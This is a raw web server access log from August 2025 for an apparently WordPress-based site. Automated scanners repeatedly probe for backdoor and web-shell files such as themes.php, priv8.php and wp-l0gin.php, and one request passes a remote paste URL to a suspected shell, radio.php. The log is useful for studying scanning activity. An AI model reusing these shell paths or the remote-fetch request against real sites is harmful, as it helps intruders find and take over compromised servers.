94.16.113.252 - - [13/Aug/2025:03:29:06 -0400] "GET /wp-admin/images/themes.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:29:21 -0400] "GET /wp-includes/js/themes.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:29:36 -0400] "GET /wp-includes/pomo/themes.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 86.8.204.43 - - [13/Aug/2025:03:29:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [13/Aug/2025:03:29:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:03:29:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:03:29:40 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [13/Aug/2025:03:29:48 -0400] "GET /wp-content/themes.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:30:00 -0400] "GET /wp-includes/css/themes.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:30:15 -0400] "GET /wp-admin/js/themes.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:30:28 -0400] "GET /wp-includes/rest-api/themes.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:30:44 -0400] "GET /wp-admin/maint/themes.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:30:59 -0400] "GET /wp-includes/Requests/themes.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:31:13 -0400] "GET /wp-content/fonts/themes.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:31:28 -0400] "GET /wp-content/themes/themes.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:31:44 -0400] "GET /wp-includes/themes.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:32:00 -0400] "GET /wp-content/backups-dup-lite/themes.php HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.73.216.186 - - [13/Aug/2025:03:32:12 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 94.16.113.252 - - [13/Aug/2025:03:32:19 -0400] "GET /wp-content/uploads/themes.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:32:33 -0400] "GET /wp-includes/theme-compat/themes.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:32:49 -0400] "GET /wp-content/updraft/themes.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:33:02 -0400] "GET /wp-includes/block-supports/themes.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:33:16 -0400] "GET /cgi-bin/themes.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:33:31 -0400] "GET /wp-includes/images/themes.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:33:48 -0400] "GET /wp-includes/widgets/themes.php HTTP/1.1" 301 265 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:34:00 -0400] "GET /wp-includes/ID3/themes.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.50.215.205 - - [13/Aug/2025:03:34:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [13/Aug/2025:03:34:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [13/Aug/2025:03:34:00 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [13/Aug/2025:03:34:01 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [13/Aug/2025:03:34:13 -0400] "GET /wp-admin/css/themes.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:34:28 -0400] "GET /wp-includes/sodium_compat/themes.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:34:42 -0400] "GET /wp-includes/style-engine/themes.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:34:53 -0400] "GET /wp-includes/PHPMailer/themes.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:35:08 -0400] "GET /.well-known/pki-validation/themes.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:35:15 -0400] "GET /wp-includes/sitemaps/themes.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:35:27 -0400] "GET /wp-includes/blocks/themes.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:35:39 -0400] "GET /css/themes.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:35:51 -0400] "GET /wp-admin/includes/themes.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:36:04 -0400] "GET /wp-includes/certificates/themes.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:36:17 -0400] "GET /wp-includes/php-compat/themes.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:36:29 -0400] "GET /wp-admin/user/themes.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:36:42 -0400] "GET /wp-includes/SimplePie/themes.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:36:56 -0400] "GET /wp-includes/block-patterns/themes.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:37:09 -0400] "GET /wp-includes.bak/block-patterns/themes.php HTTP/1.1" 301 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:37:22 -0400] "GET /wp-includes/customize/themes.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:37:35 -0400] "GET /wp-includes/IXR/themes.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:37:50 -0400] "GET /.wp-cli/themes.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:38:05 -0400] "GET /wp-content/languages/themes.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:38:19 -0400] "GET /wp-admin.bak/dir/themes.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:38:31 -0400] "GET /wp-includes.bak/random_compat/themes.php HTTP/1.1" 301 275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:38:45 -0400] "GET /wp-includes/html-api/themes.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:38:56 -0400] "GET /wp-includes/Text/themes.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:39:10 -0400] "GET /wp-content/upgrade/themes.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:39:23 -0400] "GET /.tmb/themes.php HTTP/1.1" 301 250 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:39:35 -0400] "GET /wp-content/upgrade-temp-backup/themes.php HTTP/1.1" 301 276 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:39:47 -0400] "GET /wp-content/cache/themes.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [13/Aug/2025:03:39:58 -0400] "GET /wp-includes/random_compat/themes.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 69.171.230.116 - - [13/Aug/2025:03:42:27 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 68.183.245.101 - - [13/Aug/2025:03:46:05 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [13/Aug/2025:03:46:05 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [13/Aug/2025:03:46:05 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [13/Aug/2025:03:46:05 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [13/Aug/2025:03:46:37 -0400] "GET /sts.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.24.219.37 - - [13/Aug/2025:03:46:46 -0400] "GET / HTTP/1.1" 301 231 "-" "Go-http-client/1.1" 193.36.224.150 - - [13/Aug/2025:03:46:49 -0400] "GET //wp-content/uploads/ HTTP/1.1" 301 250 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:46:50 -0400] "GET /wp-hoard.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.24.219.104 - - [13/Aug/2025:03:46:51 -0400] "GET //wp-content/plugins/ HTTP/1.1" 301 250 "-" "Go-http-client/1.1" 216.24.219.36 - - [13/Aug/2025:03:46:53 -0400] "GET //wp-admin/admin-ajax.php HTTP/1.1" 301 254 "-" "Go-http-client/1.1" 216.24.219.36 - - [13/Aug/2025:03:46:54 -0400] "GET //wp-content/themes/twenty/twenty.php HTTP/1.1" 301 266 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:46:54 -0400] "GET /wp-l0gin.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.24.219.36 - - [13/Aug/2025:03:46:55 -0400] "GET //wp-content/item.php HTTP/1.1" 301 250 "-" "Go-http-client/1.1" 216.24.219.36 - - [13/Aug/2025:03:46:55 -0400] "GET //goat11.PhP7 HTTP/1.1" 301 242 "-" "Go-http-client/1.1" 216.24.219.36 - - [13/Aug/2025:03:46:56 -0400] "GET //dropdown.php HTTP/1.1" 301 243 "-" "Go-http-client/1.1" 216.24.219.36 - - [13/Aug/2025:03:46:57 -0400] "GET //wp-includes/Text/about.php HTTP/1.1" 301 257 "-" "Go-http-client/1.1" 216.24.219.36 - - [13/Aug/2025:03:46:57 -0400] "GET //wp-includes/rest-api/about.php HTTP/1.1" 301 261 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:46:58 -0400] "GET /priv8.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.24.219.36 - - [13/Aug/2025:03:46:58 -0400] "GET //content.php HTTP/1.1" 301 242 "-" "Go-http-client/1.1" 216.24.219.36 - - [13/Aug/2025:03:46:59 -0400] "GET //wp-admin/install.php HTTP/1.1" 301 251 "-" "Go-http-client/1.1" 216.24.219.36 - - [13/Aug/2025:03:46:59 -0400] "GET //bs1.php HTTP/1.1" 301 238 "-" "Go-http-client/1.1" 216.24.219.36 - - [13/Aug/2025:03:47:00 -0400] "GET //wp-content/install.php HTTP/1.1" 301 253 "-" "Go-http-client/1.1" 193.36.224.169 - - [13/Aug/2025:03:47:02 -0400] "GET //install.php HTTP/1.1" 301 242 "-" "Go-http-client/1.1" 193.36.224.226 - - [13/Aug/2025:03:47:04 -0400] "GET //wp-includes/install.php HTTP/1.1" 301 254 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:04 -0400] "GET /wp-post-editor.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.24.219.105 - - [13/Aug/2025:03:47:05 -0400] "GET //wp-admin/images/install.php HTTP/1.1" 301 258 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:06 -0400] "GET /404.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.24.219.20 - - [13/Aug/2025:03:47:07 -0400] "GET //cgi-bin/install.php HTTP/1.1" 301 250 "-" "Go-http-client/1.1" 216.24.219.100 - - [13/Aug/2025:03:47:09 -0400] "GET //.well-known/acme-challenge/install.php HTTP/1.1" 301 269 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:09 -0400] "GET /users.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.24.219.88 - - [13/Aug/2025:03:47:11 -0400] "GET //item.php HTTP/1.1" 301 239 "-" "Go-http-client/1.1" 216.24.219.37 - - [13/Aug/2025:03:47:13 -0400] "GET //wp-content/tmpls.php HTTP/1.1" 301 251 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:15 -0400] "GET /classwithtostring.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 104.234.19.144 - - [13/Aug/2025:03:47:15 -0400] "GET //wp-admin/js/about.php HTTP/1.1" 301 252 "-" "Go-http-client/1.1" 216.24.219.97 - - [13/Aug/2025:03:47:17 -0400] "GET //wp-admin/maint/moon.php HTTP/1.1" 301 254 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:18 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 193.36.224.222 - - [13/Aug/2025:03:47:19 -0400] "GET //duck.php HTTP/1.1" 301 239 "-" "Go-http-client/1.1" 193.36.224.167 - - [13/Aug/2025:03:47:20 -0400] "GET //wp-includes/js/plupload/index.php HTTP/1.1" 301 264 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:21 -0400] "GET /admin.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 193.36.224.206 - - [13/Aug/2025:03:47:23 -0400] "GET //wp-admin/dropdown.php HTTP/1.1" 301 252 "-" "Go-http-client/1.1" 216.24.219.32 - - [13/Aug/2025:03:47:24 -0400] "GET //wp-includes/blocks/post-excerpt/index.php HTTP/1.1" 301 272 "-" "Go-http-client/1.1" 193.36.224.221 - - [13/Aug/2025:03:47:26 -0400] "GET //mar.php HTTP/1.1" 301 238 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:26 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 104.234.19.152 - - [13/Aug/2025:03:47:28 -0400] "GET //radio.php?vz=https://textbin.net/raw/bytsdwrs5a HTTP/1.1" 301 278 "-" "Go-http-client/1.1" 193.36.224.213 - - [13/Aug/2025:03:47:31 -0400] "GET //wp-content/themes/bute/lang.php HTTP/1.1" 301 262 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:33 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.24.219.100 - - [13/Aug/2025:03:47:34 -0400] "GET //wp-cron.php?ac=3 HTTP/1.1" 301 247 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:35 -0400] "GET /wp-header.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 193.36.224.150 - - [13/Aug/2025:03:47:35 -0400] "GET //wp-admin/about.php HTTP/1.1" 301 249 "-" "Go-http-client/1.1" 216.24.219.31 - - [13/Aug/2025:03:47:38 -0400] "GET //wp-content/about.php HTTP/1.1" 301 251 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:39 -0400] "GET /radio.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 193.36.224.116 - - [13/Aug/2025:03:47:41 -0400] "GET //wp-content/themes/wp-cron.php?ac=3 HTTP/1.1" 301 265 "-" "Go-http-client/1.1" 94.16.113.252 - - [13/Aug/2025:03:47:45 -0400] "GET /simple.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 